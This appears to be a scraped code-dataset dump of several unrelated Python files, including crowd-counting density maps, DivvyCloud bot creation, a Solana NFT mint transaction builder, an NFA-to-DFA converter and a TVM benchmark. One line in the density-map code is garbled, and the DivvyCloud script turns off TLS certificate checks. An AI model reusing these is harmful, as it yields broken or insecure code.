os.mkdir(os.path.join(self.rc_job.workingdir, \"images\"))\n existed_in_cache = True\n for imgtype in [\"normal\", \"projection\"]:\n if not os.path.exists(os.path.join(self.rc_job.workingdir, \"images\", imgtype)):\n existed_in_cache = False\n if os.path.exists(os.path.join(self.rc_job.source_dir, \"images\", imgtype)):\n shutil.copytree(os.path.join(self.rc_job.source_dir, \"images\", imgtype), os.path.join(self.rc_job.workingdir, \"images\", imgtype))\n elif os.path.exists(os.path.join(self.rc_job.source_dir, imgtype)):\n shutil.copytree(os.path.join(self.rc_job.source_dir, imgtype), os.path.join(self.rc_job.workingdir, \"images\", imgtype))\n nr_of_images = len(glob.glob(os.path.join(self.rc_job.workingdir, \"images\", \"*\", \"*.jpg\")))\n if nr_of_images == 0:\n self.log.append(\"No images copied from %s, failed\" % self.rc_job.source_dir)\n self.set_status(\"failed\")\n else:\n if existed_in_cache is False:\n self.log.append(\"%s images copied to cache\" % (nr_of_images))\n else:\n self.log.append(\"%s images exist in cache\" % (nr_of_images))\n self.set_status(\"success\")\n else:\n self.set_status(\"success\")","repo_name":"dirk-makerhafen/openpi3dscan","sub_path":"server/app_windows/realityCapture/prepareFolder.py","file_name":"prepareFolder.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13332263205","text":"import numpy as np\nimport scipy\nimport scipy.spatial\nfrom scipy.spatial import *\nimport scipy.io as io\nfrom scipy.ndimage.filters import gaussian_filter\nimport os\nimport glob\nfrom matplotlib import pyplot as plt\nimport h5py\nimport PIL.Image as Image\nfrom matplotlib import cm as CM\n #User's modules\nfrom dm_generator import *\n\nclass KNN_Gaussian_Kernal_DMGenerator(DensityMapGenerator):\n \n \n\n def generate_densitymap(self,image,pointsList):\n '''\n This code use k-nearst, will take one minute or more to generate a density-map with one thousand people.\n\n points: a two-dimension list of pedestrians' annotation with the order [[col,row],[col,row],...].\n image_shape: the shape of the image, same as the shape of required density-map. (row,col). Note that can not have channel.\n\n return:\n density: the density-map we want. Same shape as input image but only has one channel.\n\n example:\n points: three pedestrians with annotation:[[163,53],[175,64],[189,74]].\n image_shape: (768,1024) 768 is row and 1024 is column.\n '''\n image_shape=[image.shape[0],image.shape[1]]\n print(\"\\t Shape of current image: \",image_shape,\". Totally need generate \",len(pointsList),\"gaussian kernels.\")\n density_map = np.zeros(image_shape, dtype=np.float32)\n ground_truth_count = len(pointsList)\n if ground_truth_count == 0:\n return density_map\n\n leafsize = 2048\n # build kdtree\n tree = scipy.spatial.KDTree(pointsList.copy(), leafsize=leafsize)\n # query kdtree\n distances, locations = tree.query(pointsList, k=4)\n\n print ('\\t generate density...')\n for i, pt in enumerate(pointsList):\n pt2d = np.zeros(image_shape, dtype=np.float32)\n if int(pt[1]) 1:\n sigma = (distances[i][1]+distances[i][2]+distances[i][3])*0.1\n else:\n sigma = np.average(np.array(gt.shape))/2./2. #case: 1 point\n density_map += scipy.ndimage.filters.gaussian_filter(pt2d, sigma, mode='constant')\n print ('\\t done.')\n return density_map\n\n\nif __name__==\"__main__\":\n root = 'C:\\\\Users\\\\PC\\\\Desktop\\\\PFE related\\\\existing works\\\\Zhang_Single-Image_Crowd_Counting_CVPR_2016_paper code sample\\\\MCNN-pytorch-master\\\\MCNN-pytorch-master\\\\ShanghaiTech'\n \n # generate the ShanghaiA's ground truth\n part_A_train = os.path.join(root,'part_A\\\\train_data','images')\n part_A_test = os.path.join(root,'part_A\\\\test_data','images')\n # part_B_train = os.path.join(root,'part_B_final/train_data','images')\n # part_B_test = os.path.join(root,'part_B_final/test_data','images')\n # path_sets = [part_A_train,part_A_test]\n \n # img_paths = []\n # for path in path_sets:\n # for img_path in glob.glob(os.path.join(path, '*.jpg')):\n # img_paths.append(img_path)\n \n # for img_path in img_paths:\n # print(img_path)\n # mat = io.loadmat(img_path.replace('.jpg','.mat').replace('images','ground-truth').replace('IMG_','GT_IMG_'))\n # img= plt.imread(img_path)#768行*1024列\n # k = np.zeros((img.shape[0],img.shape[1]))\n # points = mat[\"image_info\"][0,0][0,0][0] #1546person*2(col,row)\n # mdGen=KNN_Gaussian_Kernal_DMGenerator()\n # k = mdGen.generate_densitymap(img,points)\n # # plt.imshow(k,cmap=CM.jet)\n # # save density_map to disk\n # np.save(img_path.replace('.jpg','.npy').replace('images','ground-truth'), k) \n x=np.load('C:\\\\Users\\\\PC\\\\Desktop\\\\PFE related\\\\existing works\\\\Zhang_Single-Image_Crowd_Counting_CVPR_2016_paper code sample\\\\MCNN-pytorch-master\\\\MCNN-pytorch-master\\\\ShanghaiTech\\\\ShanghaiTech\\\\part_A\\\\test_data\\\\ground-truth\\\\IMG_80.npy')\n print(type(x))\n print(x.shape)","repo_name":"goldenfay/crowd-counting-pytorch","sub_path":"ML_package/density_map_generators/knn_gaussian_kernal.py","file_name":"knn_gaussian_kernal.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43626182500","text":"## BOT STATE == paused\n## TRIGGER Bot == disabled\n### Pack_ID needs to be updated\n\n# Script to create a bot for all insights in a pack\nimport json\nimport requests\nimport getpass\n\nrequests.packages.urllib3.disable_warnings() # verify=False in the request throws a security error otherwise\n\n# Username/password to authenticate against the API\nusername = \"\"\npassword = \"\" # Leave this blank if you don't want it in plaintext and it'll prompt you to input it when running the script. \n\nif not password:\n passwd = getpass.getpass('Password:')\nelse:\n passwd = password\n\n# API URLs\nbase_url = ''\nlogin_url = base_url + '/v2/public/user/login'\n\n# PARAMS\npack_id = \"custom:167\"\npack_split = pack_id.split(\":\")\npack_number = int(pack_split[1])\nbackoffice_or_custom = pack_split[0]\n\n# Shorthand helper function\ndef get_auth_token():\n response = requests.post(\n url=login_url,\n verify=False,\n data=json.dumps({\"username\": username, \"password\": passwd}),\n headers={\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Accept': 'application/json'\n })\n return response.json()['session_id']\n\ndef get_packs():\n response = requests.get(\n url=base_url + '/v2/public/insights/packs/list',\n verify=False,\n headers=headers\n )\n return response.json()\n\ndef get_insights():\n response = requests.get(\n url=base_url + '/v2/public/insights/list',\n verify=False,\n headers=headers\n )\n return response.json() \n\ndef make_bot(insight):\n bot_name = insight['name'] + \" - ServiceNow\"\n bot_message = \"Security issue found. Name: *\" + insight['name'] + \"* Resource Name: *{{resource.name}}*\"\n \n data = {\n \"name\": bot_name,\n \"description\": \"ServiceNow Integration\",\n \"severity\": \"low\",\n \"category\": \"Security\",\n \"ondemand_enabled\": True,\n \"state\": \"PAUSED\",\n \"instructions\": {\n \"resource_types\": insight['resource_types'],\n \"groups\": [],\n \"filters\": insight['filters'],\n \"schedule\": None,\n \"schedule_description\": None,\n #All cloud accounts\n \"badges\": [\n {\n \"key\": \"system.resource_type\",\n \"value\": \"cloud\"\n }\n ],\n \"ondemand_enabled\": True,\n \"hookpoints\": [ \n \"divvycloud.resource.created\",\n \"divvycloud.resource.modified\"\n ],\n \"actions\": [\n {\n \"run_when_result_is\": True,\n \"config\": {\n \"description\": bot_name,\n \"urgency\": \"1\",\n \"comments\": bot_message\n },\n \"name\": \"servicenow.action.create_incident\"\n }\n ]\n }\n }\n response = requests.post(\n url=base_url + '/v2/public/botfactory/bot/create',\n verify=False,\n data=json.dumps(data),\n headers=headers\n )\n return response.json() \n\ndef trigger_bot( bot_id):\n response = requests.post(\n url=base_url + '/v2/public/botfactory/' + bot_id + '/ondemand',\n verify=False,\n headers=headers\n )\n return response.json() \n \nauth_token = get_auth_token()\n \nheaders = {\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Accept': 'application/json',\n 'X-Auth-Token': auth_token\n}\n \n# Get the list of packs to loop through and look for the one that was defined\npack_response = get_packs()\n \n# Get the pack ID\nfound_pack = False\nfor pack in pack_response:\n if pack['pack_id'] == pack_number:\n if pack['source'] == backoffice_or_custom:\n found_pack = True\n print(\"Found matching pack. Name: \" + pack['name'])\n backoffice_insights = pack['backoffice'] # Normal insights are in the backoffice array \n custom_insights = (pack['custom']) # Custom insights are in the custom array. Add them to backoffice\n break \n\nif not found_pack:\n print(\"No pack found matching \\\"\" + pack_id + \"\\\". Exiting.\")\n exit()\n\n# Get the info from the insights in the pack\ninsights_response = get_insights() \n\n# look through the insights for a matching ID\n# if we find it - create a bot\nprint(\"\\n == Creating bots from backoffice insights\")\nfor backoffice_insight in backoffice_insights:\n for insight in insights_response:\n if insight['source'] == \"backoffice\":\n if insight['insight_id'] == backoffice_insight:\n new_bot = make_bot(insight)\n print(\"Made a new bot: \" + new_bot['name'])\n \n # bot_trigger = trigger_bot( new_bot['resource_id'])\n # print(\"Triggered bot\")\n break\n\nprint(\"\\n == Creating bots from custom insights\")\nfor custom_insight in custom_insights:\n for insight in insights_response:\n if insight['source'] == \"custom\":\n if insight['insight_id'] == custom_insight:\n new_bot = make_bot(insight)\n print(\"Made a new bot: \" + new_bot['name'])\n \n # bot_trigger = trigger_bot( new_bot['resource_id'])\n # print(\"Triggered bot\")\n break\n","repo_name":"alpalwal/Divvy","sub_path":"Prod/scripts/Create Bots/full_pack_create_bots.py","file_name":"full_pack_create_bots.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"3477324556","text":"from anchorpy import Wallet\nfrom solana.rpc.api import Client\nfrom solana.rpc.types import TxOpts\nfrom solana.rpc.commitment import Commitment\nfrom solana.blockhash import Blockhash\nfrom solana.keypair import Keypair\nfrom solana.publickey import PublicKey\nfrom solana.transaction import AccountMeta, TransactionInstruction, Transaction\nfrom solana.system_program import create_account, CreateAccountParams\nfrom spl.token.instructions import InitializeMintParams, MintToParams, create_associated_token_account, get_associated_token_address, initialize_mint, mint_to\nfrom base58 import b58decode, b58encode\nfrom solana.rpc.core import UnconfirmedTxError\n\n\nTOKEN_PROGRAM_ID = 'TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA'\nMETADATA_PROGRAM_ID = 'metaqbxxUerdq28cj1RbAWkYQm3ybzjb6a8bt518x1s'\nSYSTEM_PROGRAM_ID = '11111111111111111111111111111111'\nSYSTEM_RENT_PROGRAM = 'SysvarRent111111111111111111111111111111111'\nSYSTEM_CLOCK_PROGRAM = 'SysvarC1ock11111111111111111111111111111111'\nMETADATA_PUBLIC_KEY = 'metaqbxxUerdq28cj1RbAWkYQm3ybzjb6a8bt518x1s'\nASSOCIATED_TOKEN_ID = 'ATokenGPvbdGVxr1b2hvZbsiqW5xWH25efTNsLJA8knL'\nCOMPUTE_BUDGET_ID = \"ComputeBudget111111111111111111111111111111\"\n\nLMN_PROGRAM = \"ArAA6CZC123yMJLUe4uisBEgvfuw2WEvex9iFmFCYiXv\"\nLMN_TRESAURY = \"33nQCgievSd3jJLSWFBefH3BJRN7h6sAoS82VFFdJGF5\"\n\nOPTS = TxOpts(skip_preflight=True, skip_confirmation=False, preflight_commitment=Commitment(\"confirmed\"))\n \nclass LaunchMyNftLaunchpad():\n\n def __init__(self, privkey: str, rpc: str, cmid: str, candy_machine_meta):\n\n self.cmid = cmid\n \n self.cm_meta = candy_machine_meta\n \n self.client = Client(rpc)\n self.payer = Keypair.from_secret_key(b58decode(privkey))\n\n def create_transaction(self):\n\n self.transaction = Transaction()\n \n self.mint_account = Keypair.generate()\n\n buyer_ata = get_associated_token_address(owner=self.payer.public_key, mint=self.mint_account.public_key)\n\n self.transaction.add(\n TransactionInstruction(\n keys=[],\n data=bytes.fromhex(\"0080a9030010270000\"),\n program_id=PublicKey(COMPUTE_BUDGET_ID)\n )\n )\n \n METADATA_PROGRAM_ADDRESS = PublicKey.find_program_address(\n seeds=[\n 'metadata'.encode('utf-8'),\n bytes(PublicKey(METADATA_PUBLIC_KEY)),\n bytes(self.mint_account.public_key)\n ],\n program_id=PublicKey(METADATA_PUBLIC_KEY)\n )\n\n EDITION_PROGRAM_ADDRESS = PublicKey.find_program_address(\n seeds=[\n 'metadata'.encode('utf-8'),\n bytes(PublicKey(METADATA_PUBLIC_KEY)),\n bytes(self.mint_account.public_key),\n 'edition'.encode('utf-8')\n ],\n program_id=PublicKey(METADATA_PUBLIC_KEY)\n )\n\n TOTAL_MINTS = PublicKey.find_program_address(\n seeds=[\n 'TotalMints'.encode('utf-8'),\n bytes(PublicKey(self.payer.public_key)),\n bytes(PublicKey(self.cmid)),\n ],\n program_id=PublicKey(LMN_PROGRAM)\n )\n keys = [\n AccountMeta(pubkey=PublicKey(self.cmid),is_writable=True, is_signer=False),\n AccountMeta(pubkey=self.payer.public_key,is_signer=True, is_writable=True),\n AccountMeta(pubkey=PublicKey(self.cm_meta.wallet),is_writable=True, is_signer=False),\n AccountMeta(pubkey=PublicKey(LMN_TRESAURY),is_writable=True, is_signer=False),\n AccountMeta(pubkey=METADATA_PROGRAM_ADDRESS[0], is_writable=True, is_signer=False),\n AccountMeta(pubkey=self.mint_account.public_key,is_writable=True, is_signer=True),\n AccountMeta(pubkey=buyer_ata, is_writable=True, is_signer=False),\n AccountMeta(pubkey=EDITION_PROGRAM_ADDRESS[0], is_writable=True, is_signer=False),\n AccountMeta(pubkey=PublicKey(TOTAL_MINTS[0]), is_writable=True, is_signer=False),\n AccountMeta(pubkey=PublicKey(ASSOCIATED_TOKEN_ID),is_writable=False, is_signer=False),\n AccountMeta(pubkey=PublicKey(METADATA_PROGRAM_ID),is_writable=False, is_signer=False),\n AccountMeta(pubkey=PublicKey(TOKEN_PROGRAM_ID),is_signer=False, is_writable=False),\n AccountMeta(pubkey=PublicKey(SYSTEM_PROGRAM_ID),is_writable=False, is_signer=False),\n AccountMeta(pubkey=PublicKey(SYSTEM_RENT_PROGRAM),is_writable=False, is_signer=False),\n AccountMeta(pubkey=PublicKey(SYSTEM_CLOCK_PROGRAM),is_signer=False, is_writable=False)\n ]\n\n price_data = list(int(self.cm_meta.data.price).to_bytes(8, \"little\"))\n main_data = list(bytes.fromhex(\"4f47cf20b266151300000000\"))\n\n data = main_data + price_data\n\n encoded_data = b58encode(bytes(data))\n data = b58decode(encoded_data)\n\n self.transaction.add(\n TransactionInstruction(\n keys=keys,\n data=data,\n program_id=PublicKey(LMN_PROGRAM)\n )\n )\n\n self.signers = [\n self.payer,\n self.mint_account\n ]\n\n \n def send_transaction(self):\n\n try:\n \n self.transaction.sign(*self.signers)\n \n tx = self.transaction.serialize(verify_signatures=False)\n\n tx_hash = self.client.send_raw_transaction(tx, OPTS)['result']\n \n return tx_hash\n\n except UnconfirmedTxError:\n\n return None\n\n except:\n \n return False\n\n\n\nif __name__ == \"__main__\":\n\n LaunchMyNftLaunchpad()\n","repo_name":"ProcreationAI/Neura","sub_path":"modules/lmn_launchpad.py","file_name":"lmn_launchpad.py","file_ext":"py","file_size_in_byte":5700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"25639876785","text":"import json\nimport sys\nfrom itertools import combinations\n\n\n #////////// Regex to NFA //////////////////////////////////////\n\nimport subprocess\nimport json\n\ndata = {\"regex\": input(\" Введите регулярное выражение: \")}\n\nwith open('regex.json', 'w') as f:\n json.dump(data, f)\n\ninput_file = \"regex.json\"\noutput_file = \"outputNFA.json\"\n\nsubprocess.run([\"python3\", \"regtodfa.py\", input_file, output_file], check=True)\n\n#///////////////////////////////////////////////////////////////\n\n\ndef check(arr,pos):\n for tup in arr:\n if set(tup)==set(pos):\n return 0\n return 1\n\n\ndef check1(arr,pos):\n for tup in arr:\n if tup==pos:\n return 0\n return 1\n\nclass nfa_to_dfa:\n def __init__(self,states,letters,transition,start_states,final_states):\n \n self.startstates=self.get_startstates(start_states,transition)\n self.allstates=self.powerset(states)\n self.final_states=self.get_finalstates(final_states)\n self.letters=letters\n self.transition=self.main_matrix(transition)\n self.prints()\n\n def prints(self):\n out={\n \"states\":self.allstates,\n \"letters\":self.letters,\n \"transition_function\":self.transition,\n \"start_states\":self.startstates,\n \"final_states\":self.final_states\n }\n \n with open (sys.argv[2],'w') as outfile:\n json.dump(dict(out),outfile,indent=4)\n\n\n def main_matrix(self,transition):\n #write separately for empty\n trans_matrix=[]\n for state in self.allstates: \n for alph in self.letters:\n dest_arr=[]\n found=0 #if alphabet not found put phi\n for st in state:\n #check through tranisition matrix and append states ,if nothing is found append to phi\n for tran in transition:\n if tran[0]==st and tran[1]==alph and st!=\"\" and check1(dest_arr,tran[2]):\n dest_arr.append(tran[2])\n found=1\n trans_matrix.append([state,alph,dest_arr])\n # for alph in self.letters:\n # trans_matrix.append([[],alph,[]])\n return trans_matrix\n\n\n def get_finalstates(self,finalstates):\n finalarr=[]\n for state in final_states:\n for pos in self.allstates:\n for each_state in pos:\n if each_state==state and check(finalarr,pos):\n finalarr.append(pos)\n return finalarr \n\n\n\n def powerset(self,states):\n all_arr=[]\n for i in range(1,len(states)+1):\n for element in combinations(states,i):\n all_arr.append(list(element))\n all_arr.append([]) \n return all_arr\n\n\n def get_startstates(self,startstates,transition):\n start_arr=[]\n for start in startstates:\n arr=[]\n arr.append(start) \n for tup in transition:\n if tup[0]==start and tup[1]==\"$\":\n arr.append(tup[2])\n start_arr.append(arr) \n return start_arr \n\n\n\nif(len(sys.argv) == 3):\n \n input_file = open(sys.argv[1],\"r\") \n file_obj = json.load(input_file)\n states = file_obj['states']\n letters=file_obj['letters']\n transition=file_obj['transition_function']\n start_states=file_obj['start_states']\n final_states=file_obj['final_states']\n dfa=nfa_to_dfa(states,letters,transition,start_states,final_states)\n print(\"------------------------------\\n\")\n print(\" DFA \\n\")\n print(\"------------------------------\\n\")\n print(\"DFA states:\", dfa.allstates)\n print(\"\\nDFA alphabets:\", dfa.letters)\n print(\"\\nDFA transitions:\", dfa.transition)\n print(\"\\nDFA start state:\", dfa.startstates)\n print(\"\\nDFA final states:\", dfa.final_states)\n print(\"\\n------------------------------\\n\")\n\nelse: \n print(\"Error\")\n print(\"Usage: python3 NFAtoDFA.py \")\n # python3 NFAtoDFA.py outputNFA.json outputDFA.json \n \n\n","repo_name":"sohaibssb/BuildCompiler","sub_path":"RegexToNFA_ToDFA_ToDFAM/NFAtoDFA.py","file_name":"NFAtoDFA.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12441340585","text":"\n#\n# Inspur.\n# This is a new or modified file.\n#\n\nimport tvm\nfrom tvm import relay\nfrom PIL import Image\n# os and numpy\nimport numpy as np\nimport os.path\n# Tensorflow imports\nimport tensorflow as tf\nfrom tensorflow.core.framework import graph_pb2\n# Tensorflow utility functions\nimport tvm.relay.testing.tf as tf_testing\nimport argparse\nimport time\n######################################################################\ntarget = 'xpu -libs=xdnn -split-device-funcs'\ntarget_host = 'llvm'\nlayout = \"NCHW\"\n#layout = None\n#ctx = tvm.context(target, 0)\n#print('ctx = ', ctx)\n#print('type of ctx = ', type(ctx))\n'''\ntarget = 'llvm'\ntarget_host = 'llvm'\nlayout = None\n#layout = \"NHWC\"\nlayout = \"NCHW\"\n#ctx = tvm.cpu(0)\nctx = tvm.context(target, 0)\n\ntarget = 'cuda'\ntarget_host = 'llvm'\nlayout = None\n#layout = \"NHWC\"\nlayout = \"NCHW\"\n#ctx = tvm.cpu(0)\nctx = tvm.context(target, 0)\n'''\n\n######################################################################\n# img_path = '/home/wangfan/.tvm_test_data/data/elephant-299.jpg'\n# model_path = '/home/wangfan/.tvm_test_data/tf/resnet50v2/resnet50_v2_inf_graph.frozen.pb'\n\ndef preprocess_image_rgb(\n image_path,\n resize_h, resize_w,\n need_scale, image_scale,\n red_bias, green_bias, blue_bias):\n # 1, resize the image\n img = Image.open(image_path).resize((resize_h, resize_w), Image.ANTIALIAS)\n image = np.asarray(img).astype(\"float32\")\n # 2, NHWC format\n img_nhwc = np.expand_dims(image, axis = 0)\n if need_scale:\n img_nhwc[:,:,:,0] = image_scale * img_nhwc[:,:,:,0] + red_bias\n img_nhwc[:,:,:,1] = image_scale * img_nhwc[:,:,:,1] + green_bias\n img_nhwc[:,:,:,2] = image_scale * img_nhwc[:,:,:,2] + blue_bias\n # 3, NCHW format\n img_nchw = img_nhwc.transpose((0,3,1,2))\n return img_nhwc, img_nchw\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--pb-path', '-p', type=str, default='',\n help=\"The tensorflow pb file path\")\nparser.add_argument('--image-path', type=str, default='',\n help=\"The input data. If not set, will use dnn-root-path's cat image\")\nargs = parser.parse_args()\n\nimg_path = '/home/wangfan/.tvm_test_data/data/elephant-299.jpg'\nmodel_path = '/home/wangfan/.tvm_test_data/tf/resnet50v2/resnet50_v2_inf_graph.frozen.pb'\n#img_path = args.image_path\n#model_path = args.pb_path\n\nimg_nhwc, img_tvm = preprocess_image_rgb(\n img_path,\n 224, 224,\n True, 2.0 / 255.0,\n -1, -1, -1\n )\n\n######################################################################\n# Import model\n# ------------\n# Creates tensorflow graph definition from protobuf file.\n\nwith tf.gfile.FastGFile(model_path, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n graph = tf.import_graph_def(graph_def, name='')\n # Call the utility to import the graph definition into default graph.\n graph_def = tf_testing.ProcessGraphDefParam(graph_def)\n #print(graph_def)\n # Add shapes to the graph.\n with tf.Session() as sess:\n graph_def = tf_testing.AddShapesToGraphDef(sess, 'resnet_v1_50/predictions/Reshape_1')\n\n######################################################################\n# Decode image\nfrom PIL import Image\nimage = Image.open(img_path).resize((224, 224))\n\nx = np.array(img_nhwc) \n#print(x.shape) # shenfw add\n#x = np.random.randint(10, size=(1, 224, 224, 3)) # shenfw add\n#x = np.array(x.astype(float)) # shenfw add\n#print(x.shape) # shenfw add\n######################################################################\n# Import the graph to Relay\n# -------------------------\n# Import tensorflow graph definition to relay frontend.\n#\n# Results:\n# sym: relay expr for given tensorflow protobuf.\n# params: params converted from tensorflow params (tensor protobuf).\nshape_dict = {'input__0': x.shape}\n#dtype_dict = {'DecodeJpeg/contents': 'uint8'}\nmod, params = relay.frontend.from_tensorflow(graph_def,\n layout=layout,\n shape=shape_dict)\nprint(\"Tensorflow protobuf imported to relay frontend.\")\n\n# print(mod)\n\n# Relay Build\n# -----------\n# Compile the graph to llvm target with given input specification.\n#\n# Results:\n# graph: Final graph after compilation.\n# params: final params after compilation.\n# lib: target library which can be deployed on target with TVM runtime.\n\nwith relay.build_config(opt_level=3):\n graph, lib, params = relay.build(mod,\n target=target,\n target_host=target_host,\n params=params)\n######################################################################\n# Execute the portable graph on TVM\n# ---------------------------------\n# Now we can try deploying the compiled model on target.\n#print(graph)\nfrom tvm.contrib import graph_runtime\nm = graph_runtime.create(graph, lib)\n# set inputs\nm.set_input('input', tvm.nd.array(x.astype(\"float32\")))\nm.set_input(**params)\nm.run()\n#print('ctx = ', ctx)\nprint('lib = ', lib)\n#print('graph = ', graph)\ntvm_output = m.get_output(0, tvm.nd.empty((1, 1000), 'float32')) # 1, 1000\n\nstart = time.time()\nfor i in range(100):\n #m.set_input('input', tvm.nd.array(x.astype(\"float32\")))\n m.run()\n tvm_output = m.get_output(0, tvm.nd.empty((1, 1000), 'float32'))\nend = time.time()\n#tvm_output = m.get_output(0, tvm.nd.empty((1, 1000), 'float32')) \nprint('the runtime is: ')\nprint((end-start)*1000/100.)\nprint(\"===================== TVM output ===============================\")\npredictions = tvm_output.asnumpy()\npredictions = np.squeeze(predictions)\nxtcl_topk = predictions.argsort()[-5:][::-1]\nprint(xtcl_topk)\n\n######################################################################\ndef run_inference_on_image(image):\n \"\"\"Runs inference on an image.\n Parameters\n ----------\n image: String\n Image file name.\n Returns\n -------\n Nothing\n \"\"\"\n # evaluate TF\n tf.reset_default_graph()\n graph_def = graph_pb2.GraphDef()\n with open(model_path, 'rb') as f:\n graph_def.ParseFromString(f.read())\n g = tf.import_graph_def(graph_def)\n with tf.Session(graph=g) as sess:\n image_input_tensor = sess.graph.get_tensor_by_name('import/' + 'input:0')\n outputs = [sess.graph.get_tensor_by_name(\"import/\" + 'resnet_v1_50/predictions/Reshape_1:0')]\n predictions = sess.run(outputs, feed_dict={image_input_tensor: img_nhwc})\n predictions = np.squeeze(predictions)\n top_k = predictions.argsort()[-5:][::-1]\n print(\"===================== Tensorflow output ===============================\")\n print(top_k)\n return top_k\n#begin = time.time()\ntf_topk = run_inference_on_image(img_path)\n#end = time.time()\n#print('tf time is: ', end-begin)\nassert np.alltrue(xtcl_topk == tf_topk)\n","repo_name":"LCAI-TIHU/SW","sub_path":"compiler_runtime/tutorials/frontend/test_resnet50v1.py","file_name":"test_resnet50v1.py","file_ext":"py","file_size_in_byte":6863,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"72"} +{"seq_id":"23085713624","text":"from collections import deque\nfrom typing import List\n\n\nclass Edge:\n def __init__(self, u, v):\n self.u = u\n self.v = v\n self.used = False\n\n\ndef get_build_order(n: int, graph: List[List[int]], edges: List[Edge]) -> List[int]:\n build_order = [-1] * n\n order = 0\n for i in range(n):\n q = deque([i])\n while q:\n u = q.popleft()\n if build_order[u] >= 0:\n continue\n buildable = True\n for j in graph[u]:\n if edges[j].v == u and not edges[j].used:\n buildable = False\n if buildable:\n build_order[u] = order\n order += 1\n for j in graph[u]:\n if edges[j].u == u:\n edges[j].used = True\n q.append(edges[j].v)\n res = [0] * n\n for i in range(n):\n if build_order[i] < 0:\n return []\n res[build_order[i]] = i\n return res\n\n\ndef ns(f):\n return next(f).strip()\n\n\ndef solve(fp: str) -> None:\n print(f\"# {fp}\")\n with open(fp) as f:\n n, m = map(int, ns(f).split())\n graph = [[] for _ in range(n)]\n edges = [None for _ in range(m)]\n for i in range(m):\n u, v = map(lambda x: int(x) - 1, ns(f).split())\n edges[i] = Edge(u, v)\n graph[u].append(i)\n graph[v].append(i)\n res = get_build_order(n, graph, edges)\n print(\" \".join(list(map(lambda x: str(x + 1), res))) if res else \"error\")\n print()\n\n\n# solve(\"../testcases/04_07/01.txt\")\n# solve(\"../testcases/04_07/02.txt\")\n# solve(\"../testcases/04_07/03.txt\")\n# solve(\"../testcases/04_07/04.txt\")\n# solve(\"../testcases/04_07/05.txt\")\n# solve(\"../testcases/04_07/06.txt\")\n\n# # ../testcases/04_07/01.txt\n# 5 6 2 1 4 3\n\n# # ../testcases/04_07/02.txt\n# error\n\n# # ../testcases/04_07/03.txt\n# 2 1 3 5 12 9 8 4 7 6 10 11\n\n# # ../testcases/04_07/04.txt\n# error\n\n# # ../testcases/04_07/05.txt\n# 1 2\n\n# # ../testcases/04_07/06.txt\n# error\n","repo_name":"e5pe0n/algorithm-training","sub_path":"cracking_the_coding_interview_6th/chapter04/python/04_07_v01.py","file_name":"04_07_v01.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25263604967","text":"from django.shortcuts import render, get_object_or_404\n\nfrom core.filters import ProductFilter\nfrom core.view_logger import view_logger\nfrom .models import Product\nfrom .services.crud import filtering_related_products,paginate, get_all_brands\n\n\n# @view_logger\ndef get_all_products(request):\n \"\"\"Вернет всe товары на главной странице каталога\"\"\"\n\n filter_obj = ProductFilter(request.GET, queryset=Product.objects.select_related('brand','category','gender'))\n\n context = {\n 'title': 'Каталог',\n 'products': paginate(request, filter_obj.qs),\n 'current_sort': request.GET.get('sorting'),\n 'brands': get_all_brands(),\n 'filter': filter_obj\n }\n return render(request, 'productapp/products.html', context)\n\n\n\n@view_logger\ndef get_single_product_page(request, pk: int):\n \"\"\" Вернет карт��чку товара,а так же, связанные товары сортированные по полу,\n который соответсвует товару из карточки\"\"\"\n\n product = get_object_or_404(Product, pk=pk)\n context = {\n 'title': 'Страница продукта',\n 'product': product,\n 'products': filtering_related_products(product),\n }\n return render(request, 'productapp/single_product.html', context)\n","repo_name":"Korwys/django-online-store","sub_path":"mainapp/productapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35393281565","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@Author :apple.li\n@Time :2020/6/4 13:56\n@File :score_fn.py\n@Desc :\n\"\"\"\n\n\ndef test_score(file_path):\n with open(file_path, encoding='utf-8') as fr:\n score = 0.0\n sample_num = 0\n history = []\n while True:\n line = fr.readline()\n if not line:\n break\n line = line.strip()\n if line == '':\n print('\\n'.join(history))\n while True:\n s = input('Score ? ')\n try:\n s = float(s)\n break\n except ValueError:\n print('\"s\" Must be float type !')\n continue\n score += s\n sample_num += 1\n print('Score: {:.2f}. Num: {}. Ave score: {:.4f}\\n'.format(score, sample_num, score / sample_num))\n history = []\n else:\n history.append(line)\n print('Final ===> Score: {:.2f}. Num: {}. Ave score: {:.4f}\\n\\n'.format(score, sample_num, score / sample_num))\n\n\nif __name__ == '__main__':\n # test_score('../test_1_sample.txt') # 0.979\n test_score('../test_2_sample.txt') # 0.9650\n\n\"\"\"\n[1] 你 告诉 我 一下 几点 了 可以 吗 ?\n现在 是 上午 8 点 哦 。\n那 还好 , 迟 不了 , 谢谢 你 了 。\n不客气哦,对了今天济南晴转多云,南风,最高气温:24℃,最低气温:14℃,注意保暖哦。\n\n[1] 你好 啊 , 麻烦 问 一下 现在 几点 了 ?\n现在 是 20 18 年 10 月 17 日 , 上午 7 : 00 。\n好 嘞 , 谢 啦 , 有 你 真 好 哦 。\n[2] 嘿嘿 , 能 帮到 你 我 很 开心 呢 , 天气 方面 要 不要 看看 呀 ?\n好 啊 , 正想 问 你 呢 